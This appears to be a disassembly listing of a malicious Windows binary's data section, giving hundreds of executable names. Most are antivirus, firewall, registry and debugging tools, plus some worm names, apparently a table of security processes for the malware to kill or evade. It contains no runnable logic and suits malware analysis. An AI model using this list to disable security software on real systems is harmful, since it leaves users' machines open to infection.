aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .data:004225CC�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .data:004225C8�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .data:004225C4�o
align 4
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .data:004225C0�o
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .data:004225BC�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .data:004225B8�o
align 4
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .data:004225B4�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .data:004225B0�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .data:004225AC�o
align 4
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .data:004225A8�o
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .data:004225A4�o
align 4
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .data:004225A0�o
align 10h
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .data:0042259C�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .data:00422598�o
align 4
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .data:00422594�o
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .data:00422590�o
align 4
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .data:0042258C�o
align 10h
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .data:00422588�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .data:00422584�o
align 4
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .data:00422580�o
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .data:0042257C�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .data:00422578�o
align 10h
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .data:00422574�o
align 4
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .data:00422570�o
align 4
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .data:0042256C�o
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .data:00422568�o
align 4
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .data:00422564�o
align 4
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .data:00422560�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .data:0042255C�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .data:00422558�o
align 4
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .data:00422554�o
align 10h
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .data:00422550�o
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .data:0042254C�o
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .data:00422548�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .data:00422544�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .data:00422540�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .data:0042253C�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .data:00422538�o
align 4
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .data:00422534�o
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .data:00422530�o
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .data:0042252C�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .data:00422528�o
align 10h
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .data:00422524�o
align 10h
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .data:00422520�o
align 10h
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .data:0042251C�o
align 10h
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .data:00422518�o
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .data:00422514�o
align 4
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .data:00422510�o
align 10h
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .data:0042250C�o
align 10h
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .data:00422508�o
align 4
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .data:00422504�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .data:00422500�o
align 4
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .data:004224FC�o
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .data:004224F8�o
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .data:004224F4�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .data:004224F0�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .data:004224EC�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .data:004224E8�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .data:004224E4�o
align 4
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .data:004224E0�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .data:004224DC�o
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .data:004224D8�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .data:004224D4�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .data:004224D0�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .data:004224CC�o
align 10h
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .data:004224C8�o
align 4
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .data:004224C4�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .data:004224C0�o
align 4
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .data:004224BC�o
align 4
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .data:004224B8�o
align 10h
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .data:004224B0�o
; .data:004224B4�o
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .data:004224AC�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .data:004224A8�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .data:004224A4�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .data:004224A0�o
align 4
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .data:0042249C�o
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .data:00422498�o
align 10h
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .data:00422494�o
align 10h
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .data:00422490�o
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .data:0042248C�o
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .data:00422488�o
align 4
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .data:00422484�o
align 4
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .data:0042247C�o
; .data:00422480�o
align 4
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .data:00422478�o
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .data:00422474�o
align 4
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .data:00422470�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .data:0042246C�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: .data:00422468�o
align 10h
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .data:00422464�o
align 10h
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .data:00422460�o
align 10h
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .data:0042245C�o
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .data:00422458�o
align 4
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .data:00422454�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .data:00422450�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .data:0042244C�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .data:00422448�o
align 4
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .data:00422444�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .data:00422440�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .data:0042243C�o
align 4
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .data:00422438�o
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .data:00422434�o
align 4
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .data:00422430�o
align 10h
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .data:0042242C�o
align 4
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .data:00422428�o
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .data:00422424�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .data:00422420�o
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .data:0042241C�o
align 4
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .data:00422418�o
align 4
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .data:00422414�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .data:00422410�o
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .data:0042240C�o
align 10h
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .data:00422408�o
align 10h
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .data:00422404�o
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .data:00422400�o
align 10h
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .data:004223FC�o
align 4
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .data:004223F8�o
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .data:004223F4�o
align 4
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .data:004223F0�o
align 10h
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .data:004223EC�o
align 4
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .data:004223E8�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .data:004223E4�o
align 4
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .data:004223E0�o
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .data:004223DC�o
align 4
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .data:004223D8�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .data:004223D4�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .data:004223D0�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .data:004223CC�o
align 4
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .data:004223C8�o
align 4
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .data:004223C4�o
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .data:004223C0�o
align 10h
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .data:004223BC�o
align 4
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .data:004223B8�o
align 4
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .data:004223B4�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .data:004223B0�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .data:004223AC�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .data:004223A8�o
align 4
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .data:004223A4�o
align 10h
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .data:004223A0�o
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .data:0042239C�o
align 4
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .data:00422398�o
align 4
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .data:00422394�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .data:00422390�o
align 4
aMsconfig_exe db 'MSCONFIG.EXE',0 ; DATA XREF: .data:0042238C�o
align 4
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .data:00422388�o
align 10h
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .data:00422384�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .data:00422380�o
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .data:0042237C�o
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .data:00422378�o
align 10h
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .data:00422374�o
align 4
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .data:00422370�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .data:0042236C�o
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .data:00422368�o
align 4
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .data:00422364�o
align 4
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .data:00422360�o
align 10h
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .data:0042235C�o
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .data:00422358�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .data:00422354�o
align 4
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .data:00422350�o
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .data:0042234C�o
align 4
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .data:00422348�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .data:00422344�o
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .data:00422340�o
align 4
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .data:0042233C�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .data:00422338�o
align 4
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .data:00422334�o
align 10h
aMd_exe db 'MD.EXE',0 ; DATA XREF: .data:00422330�o
align 4
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .data:0042232C�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .data:00422328�o
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .data:00422320�o
; .data:00422324�o
align 4
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .data:0042231C�o
align 10h
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .data:00422318�o
align 10h
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .data:00422314�o
align 10h
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .data:00422310�o
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .data:0042230C�o
align 4
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .data:00422308�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .data:00422304�o
align 4
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .data:00422300�o
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .data:004222FC�o
align 10h
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .data:004222F4�o
; .data:004222F8�o
align 4
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .data:004222F0�o
align 4
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .data:004222EC�o
align 4
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .data:004222E8�o
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .data:004222E4�o
align 4
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .data:004222E0�o
align 4
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .data:004222DC�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .data:004222D8�o
align 10h
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .data:004222D4�o
align 10h
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .data:004222D0�o
align 4
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .data:004222CC�o
align 4
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .data:004222C8�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .data:004222C4�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .data:004222C0�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .data:004222BC�o
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .data:004222B8�o
align 10h
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .data:004222B4�o
align 4
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .data:004222B0�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .data:004222AC�o
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .data:004222A8�o
align 10h
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .data:004222A4�o
align 4
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .data:004222A0�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .data:0042229C�o
align 4
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .data:00422298�o
align 10h
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .data:00422294�o
align 4
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .data:00422290�o
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .data:0042228C�o
align 4
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .data:00422288�o
align 10h
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .data:00422284�o
align 4
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .data:00422280�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .data:0042227C�o
align 4
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .data:00422278�o
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .data:00422274�o
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .data:00422270�o
align 4
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .data:0042226C�o
align 4
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .data:00422268�o
align 10h
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .data:00422264�o
align 4
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .data:00422260�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .data:0042225C�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .data:00422258�o
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .data:00422254�o
align 10h
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .data:00422250�o
align 10h
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .data:0042224C�o
align 10h
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .data:00422248�o
align 4
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .data:00422244�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .data:00422240�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .data:00422238�o
; .data:0042223C�o
align 4
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .data:00422234�o
align 4
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .data:00422230�o
align 4
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .data:0042222C�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .data:00422228�o
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .data:00422224�o
align 4
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .data:00422220�o
align 4
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .data:0042221C�o
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .data:00422218�o
align 4
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .data:00422214�o
align 10h
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .data:00422210�o
align 4
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .data:0042220C�o
align 4
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .data:00422208�o
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .data:00422204�o
align 10h
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .data:00422200�o
align 10h
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .data:004221FC�o
align 10h
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .data:004221F8�o
align 4
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .data:004221F4�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .data:004221F0�o
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .data:004221EC�o
align 4
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .data:004221E8�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .data:004221E4�o
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .data:004221E0�o
align 10h
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .data:004221DC�o
align 4
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .data:004221D8�o
align 4
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .data:004221D4�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .data:004221D0�o
align 10h
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .data:004221CC�o
align 4
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .data:004221C8�o
align 4
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .data:004221C4�o
align 4
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .data:004221C0�o
align 10h
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .data:004221BC�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .data:004221B8�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .data:004221B4�o
align 4
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .data:004221B0�o
align 10h
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .data:004221AC�o
align 4
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .data:004221A8�o
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .data:004221A4�o
align 10h
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .data:004221A0�o
align 4
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .data:0042219C�o
align 10h
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .data:00422198�o
align 4
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .data:00422194�o
align 10h
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .data:00422190�o
align 10h
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .data:0042218C�o
align 10h
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .data:00422188�o
align 4
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .data:00422184�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .data:00422180�o
align 4
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .data:0042217C�o
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .data:00422178�o
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .data:00422174�o
align 4
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .data:00422170�o
align 4
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .data:0042216C�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .data:00422168�o
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .data:00422164�o
align 10h
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .data:00422160�o
align 10h
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .data:0042215C�o
align 4
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .data:00422158�o
align 4
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .data:00422154�o
align 4
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .data:00422150�o
align 4
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .data:0042214C�o
align 4
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .data:00422148�o
align 4
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .data:00422144�o
align 4
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .data:00422140�o
align 4
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .data:0042213C�o
align 10h
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .data:00422138�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .data:00422134�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .data:00422130�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .data:0042212C�o
align 10h
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .data:00422128�o
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .data:00422124�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .data:00422120�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .data:0042211C�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .data:00422118�o
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .data:00422114�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .data:00422110�o
align 10h
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .data:0042210C�o
align 10h
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .data:00422108�o
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .data:00422104�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .data:00422100�o
align 10h
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .data:004220FC�o
align 10h
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .data:004220F8�o
align 4
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .data:004220F4�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .data:004220F0�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .data:004220EC�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .data:004220E8�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .data:004220E4�o
align 4
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .data:004220E0�o
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .data:004220D8�o
align 10h
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .data:004220D4�o
align 10h
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .data:004220D0�o
aCv_exe db 'CV.EXE',0 ; DATA XREF: .data:004220CC�o
align 4
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .data:004220C8�o
align 10h
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .data:004220C4�o
align 10h
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .data:004220C0�o
align 10h
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .data:004220BC�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .data:004220B8�o
align 10h
